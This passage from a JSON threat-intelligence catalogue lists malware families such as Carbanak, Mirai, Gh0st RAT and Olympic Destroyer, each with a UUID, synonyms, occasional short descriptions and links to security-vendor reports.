"http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html",
"https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers"
]
}
},
{
"uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40",
"value": "WMI Ghost",
"description": "",
"meta": {
"synonyms": [
"Wimmie",
"Syndicasec"
],
"type": [],
"refs": [
"https://secrary.com/ReversingMalware/WMIGhost/",
"https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
]
}
},
{
"uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832",
"value": "Carbanak",
"description": "",
"meta": {
"synonyms": [
"Anunak"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
"https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf",
"https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf"
]
}
},
{
"uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd",
"value": "MM Core",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose"
]
}
},
{
"uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0",
"value": "CryptoLuck",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/"
]
}
},
{
"uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571",
"value": "YoungLotus",
"description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n",
"meta": {
"synonyms": [
"DarkShare"
],
"type": [],
"refs": [
"https://www.youtube.com/watch?v=AUGxYhE_CUY"
]
}
},
{
"uuid": "09b555be-8bac-44b2-8741-922ee0b87880",
"value": "Satana",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/threat-spotlight-satan-raas"
]
}
},
{
"uuid": "6201c337-1599-4ced-be9e-651a624c20be",
"value": "GhostAdmin",
"description": "",
"meta": {
"synonyms": [
"Ghost iBot"
],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/",
"https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html"
]
}
},
{
"uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed",
"value": "XBTL",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "e186384b-8001-4cdd-b170-1548deb8bf04",
"value": "SpyBanker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://news.drweb.com/show/?i=11104&lng=en",
"http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/"
]
}
},
{
"uuid": "591b2882-65ba-4629-9008-51ed3467510a",
"value": "Gaudox",
"description": "Gaudox is an HTTP loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32-bit only).",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html"
]
}
},
{
"uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87",
"value": "NgrBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/",
"https://research.checkpoint.com/dorkbot-an-investigation/",
"http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html"
]
}
},
{
"uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27",
"value": "ASPC",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b",
"value": "CookieBag",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "0646a6eb-1c13-4d87-878e-9431314597bf",
"value": "Snojan",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9"
]
}
},
{
"uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d",
"value": "Smominru",
"description": "",
"meta": {
"synonyms": [
"Ismo"
],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
"http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
]
}
},
{
"uuid": "5060756f-8385-465d-a7dd-7bf09a54da92",
"value": "Alphabet Ransomware",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/813714602466877440"
]
}
},
{
"uuid": "cd397973-8f42-4c49-8322-414ea77ec773",
"value": "Olyx",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html",
"https://news.drweb.com/show/?i=1750&lng=en&c=14"
]
}
},
{
"uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6",
"value": "Koadic",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
"https://github.com/zerosum0x0/koadic"
]
}
},
{
"uuid": "51f53823-d289-4176-af45-3fca7eda824b",
"value": "Ramdo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88",
"value": "RedAlpha",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.recordedfuture.com/redalpha-cyber-campaigns/"
]
}
},
{
"uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6",
"value": "Shujin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.nyxbone.com/malware/chineseRansom.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/"
]
}
},
{
"uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200",
"value": "yty",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/"
]
}
},
{
"uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387",
"value": "Xbot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/",
"https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/"
]
}
},
{
"uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e",
"value": "WMImplant",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
]
}
},
{
"uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5",
"value": "HyperBro",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/luckymouse-hits-national-data-center/86083/"
]
}
},
{
"uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f",
"value": "Mole",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware",
"https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/"
]
}
},
{
"uuid": "e1410684-c695-4c89-ae5f-80ced136afbd",
"value": "Gh0stnet",
"description": "",
"meta": {
"synonyms": [
"Remosh"
],
"type": [],
"refs": [
"https://en.wikipedia.org/wiki/GhostNet",
"http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html"
]
}
},
{
"uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd",
"value": "Nabucur",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "a70e93a7-3578-47e1-9926-0818979ed866",
"value": "RedLeaves",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
"https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
"http://blog.macnica.net/blog/2017/12/post-8c22.html",
"https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves",
"https://www.jpcert.or.jp/magazine/acreport-redleaves.html"
]
}
},
{
"uuid": "d84ebd91-58f6-459f-96a1-d028a1719914",
"value": "WellMess",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html"
]
}
},
{
"uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267",
"value": "Woolger",
"description": "",
"meta": {
"synonyms": [
"WoolenLogger"
],
"type": [],
"refs": [
"http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf",
"https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
]
}
},
{
"uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb",
"value": "GoldenEye",
"description": "",
"meta": {
"synonyms": [
"Petya/Mischa"
],
"type": [],
"refs": [
"https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
"https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/",
"http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html"
]
}
},
{
"uuid": "80acc956-d418-42e3-bddf-078695a01289",
"value": "Dok",
"description": "",
"meta": {
"synonyms": [
"Retefe"
],
"type": [],
"refs": [
"http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/",
"https://www.govcert.admin.ch/blog/33/the-retefe-saga",
"http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same",
"https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/"
]
}
},
{
"uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2",
"value": "SynAck",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/"
]
}
},
{
"uuid": "5f9ba149-100a-46eb-a959-0645d872975b",
"value": "XPCTRA",
"description": "Incorporates code from Quasar RAT.",
"meta": {
"synonyms": [
"Expectra"
],
"type": [],
"refs": [
"https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/",
"https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis"
]
}
},
{
"uuid": "6f155c95-3090-4730-8d3b-0b246162a83a",
"value": "GetMail",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411",
"value": "NewPosThings",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/",
"https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html",
"https://asert.arbornetworks.com/lets-talk-about-newposthings/",
"http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/"
]
}
},
{
"uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a",
"value": "BKA Trojaner",
"description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German.",
"meta": {
"synonyms": [
"bwin3_bka"
],
"type": [],
"refs": [
"https://www.evild3ad.com/405/bka-trojaner-ransomware/"
]
}
},
{
"uuid": "a0899fec-161d-4ba8-9594-8b5620c21705",
"value": "Prilex",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.kaspersky.com/blog/chip-n-pin-cloning/21502",
"https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/"
]
}
},
{
"uuid": "fbed27da-551d-4793-ba7e-128256326909",
"value": "BravoNC",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
]
}
},
{
"uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9",
"value": "Jigsaw",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d",
"value": "Neutrino POS",
"description": "",
"meta": {
"synonyms": [
"Jimmy"
],
"type": [],
"refs": [
"https://securelist.com/neutrino-modification-for-pos-terminals/78839/",
"https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/"
]
}
},
{
"uuid": "c57a4168-cd09-4611-a665-bbcede80f42b",
"value": "Monero Miner",
"description": "",
"meta": {
"synonyms": [
"CoinMiner"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/"
]
}
},
{
"uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48",
"value": "Godzilla Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346"
]
}
},
{
"uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b",
"value": "Sakula RAT",
"description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.",
"meta": {
"synonyms": [
"Sakurel"
],
"type": [],
"refs": [
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1",
"https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99",
"https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula",
"https://www.secureworks.com/research/sakula-malware-family"
]
}
},
{
"uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f",
"value": "Unidentified 033",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7",
"value": "WSO",
"description": "",
"meta": {
"synonyms": [
"Webshell by Orb"
],
"type": [],
"refs": [
"https://github.com/wso-shell",
"https://securelist.com/energetic-bear-crouching-yeti/85345/"
]
}
},
{
"uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9",
"value": "Bahamut",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/"
]
}
},
{
"uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1",
"value": "Freenki Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/",
"http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
]
}
},
{
"uuid": "f7674d06-450a-4150-9180-afef94cce53c",
"value": "KokoKrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/812726545173401600"
]
}
},
{
"uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28",
"value": "Olympic Destroyer",
"description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympics.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
"https://www.lastline.com/labsblog/olympic-destroyer-south-korea/",
"https://securelist.com/the-devils-in-the-rich-header/84348/",
"https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/",
"https://securelist.com/olympic-destroyer-is-still-alive/86169/",
"http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html",
"https://www.lastline.com/labsblog/attribution-from-russia-with-code/",
"https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/"
]
}
},
{
"uuid": "aea21616-061d-4177-9512-8887853394ed",
"value": "StegoLoader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer"
]
}
},
{
"uuid": "18419355-fd28-41a6-bffe-2df68a7166c4",
"value": "FlawedAmmyy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/Coldzer0/Ammyy-v3",
"https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/",
"https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat"
]
}
},
{
"uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043",
"value": "Rikamanu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
]
}
},
{
"uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738",
"value": "Ghost RAT",
"description": "",
"meta": {
"synonyms": [
"PCRat",
"Gh0st RAT"
],
"type": [],
"refs": [
"https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/",
"http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf",
"https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new",
"https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
"http://www.malware-traffic-analysis.net/2018/01/04/index.html",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/",
"https://blog.cylance.com/the-ghost-dragon"
]
}
},
{
"uuid": "97c1524a-c052-49d1-8770-14b513d8a830",
"value": "Unidentified 039",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c",
"value": "CabArt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e",
"value": "Pkybot",
"description": "Pkybot is a trojan whose roots lie in a downloader dubbed Bublik in 2013; it was seen distributing GameoverZeus in 2014 (ref: Fortinet). At the beginning of 2015, webinject capability using the infamous ATS was added, according to Kleissner/Kafeine/iSight.",
"meta": {
"synonyms": [
"Pykbot",
"TBag",
"Bublik"
],
"type": [],
"refs": [
"http://blog.kleissner.org/?p=788",
"https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution",
"http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot"
]
}
},
{
"uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd",
"value": "Kitmos",
"description": "",
"meta": {
"synonyms": [
"KitM"
],
"type": [],
"refs": [
"https://www.f-secure.com/weblog/archives/00002558.html"
]
}
},
{
"uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5",
"value": "Dimnie",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/"
]
}
},
{
"uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d",
"value": "RatabankaPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trex.re.kr/3",
"https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf"
]
}
},
{
"uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b",
"value": "Rex",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/",
"https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/"
]
}
},
{
"uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b",
"value": "BlackShades",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/",
"https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/",
"http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
"https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/"
]
}
},
{
"uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed",
"value": "MyKings Spreader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
"http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
]
}
},
{
"uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5",
"value": "Rapid Ransom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malwrhunterteam/status/997748495888076800",
"https://twitter.com/malwrhunterteam/status/977275481765613569"
]
}
},
{
"uuid": "17e12216-a303-4a00-8283-d3fe92d0934c",
"value": "Mirai",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/",
"https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html",
"https://twitter.com/PhysicalDrive0/status/830070569202749440"
]
}
},
{
"uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232",
"value": "SyncCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/"
]
}
},
{
"uuid": "64f5ae85-1324-43de-ba3a-063785567be0",
"value": "WebC2-Ausov",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4",
"value": "WebC2-Cson",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada",
"value": "Gazer",
"description": "",
"meta": {
"synonyms": [
"WhiteBear"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/",
"https://securelist.com/introducing-whitebear/81638/",
"https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
"https://github.com/eset/malware-ioc/tree/master/turla"
]
}
},
{
"uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d",
"value": "r2r2",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/"
]
}
},
{
"uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202",
"value": "Ztorg",
"description": "",
"meta": {
"synonyms": [
"Qysly"
],
"type": [],
"refs": [
"http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2",
"https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1",
"https://securelist.com/ztorg-from-rooting-to-sms/78775/"
]
}
},
{
"uuid": "81917a93-6a70-4334-afe2-56904c1fafe9",
"value": "Bashlite",
"description": "",
"meta": {
"synonyms": [
"lizkebab",
"qbot",
"torlus",
"Gafgyt",
"gayfgt"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/",
"https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
"https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/"
]
}
},
{
"uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae",
"value": "smac",
"description": "",
"meta": {
"synonyms": [
"speccom"
],
"type": [],
"refs": [
"https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf"
]
}
},
{
"uuid": "0be67307-670d-4558-bcf7-1387047bca4b",
"value": "Delta(Alfa,Bravo, ...)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/"
]
}
},
{
"uuid": "f98b4092-5f32-407c-9015-2da787d70c64",
"value": "Biscuit",
"description": "",
"meta": {
"synonyms": [
"zxdosml"
],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b",
"value": "Unidentified 024 (Ransomware)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malwrhunterteam/status/789161704106127360"
]
}
},
{
"uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd",
"value": "Venus Locker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/813690129088937984"
]
}
},
{
"uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a",
"value": "JQJSNICKER",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://marcmaiffret.com/vault7/"
]
}
},
{
"uuid": "68039fbe-2eee-4666-b809-32a011e9852a",
"value": "APT3 Keylogger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/",
"https://twitter.com/smoothimpact/status/773631684038107136",
"http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
]
}
},
{
"uuid": "6e0545df-8df6-4990-971c-e96c4c60d561",
"value": "Charger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.checkpoint.com/2017/01/24/charger-malware/",
"http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html"
]
}
},
{
"uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6",
"value": "Unidentified APK 001",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/illegalFawn/status/826775250583035904"
]
}
},
{
"uuid": "5ee77368-5e09-4016-ae73-82b99e830832",
"value": "Polyglot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/"
]
}
},
{
"uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5",
"value": "Ebury",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/",
"https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/",
"https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/",
"https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
"https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf"
]
}
},
{
"uuid": "ff4254e5-f301-4804-9a0f-e010af56576c",
"value": "DeputyDog",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
]
}
},
{
"uuid": "257da597-7e6d-4405-9b10-b4206bb013ca",
"value": "EHDevel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/"
]
}
},
{
"uuid": "c359c74e-4155-4e66-a344-b56947f75119",
"value": "RCS",
"description": "",
"meta": {
"synonyms": [
"Remote Control System",
"Crisis"
],
"type": [],
"refs": [
"https://www.f-secure.com/documents/996508/1030745/callisto-group",
"https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/"
]
}
},
{
"uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d",
"value": "CryptoShuffler",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/"
]
}
},
{
"uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618",
"value": "Red Alert",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/816237293073797121"
]
}
},
{
"uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7",
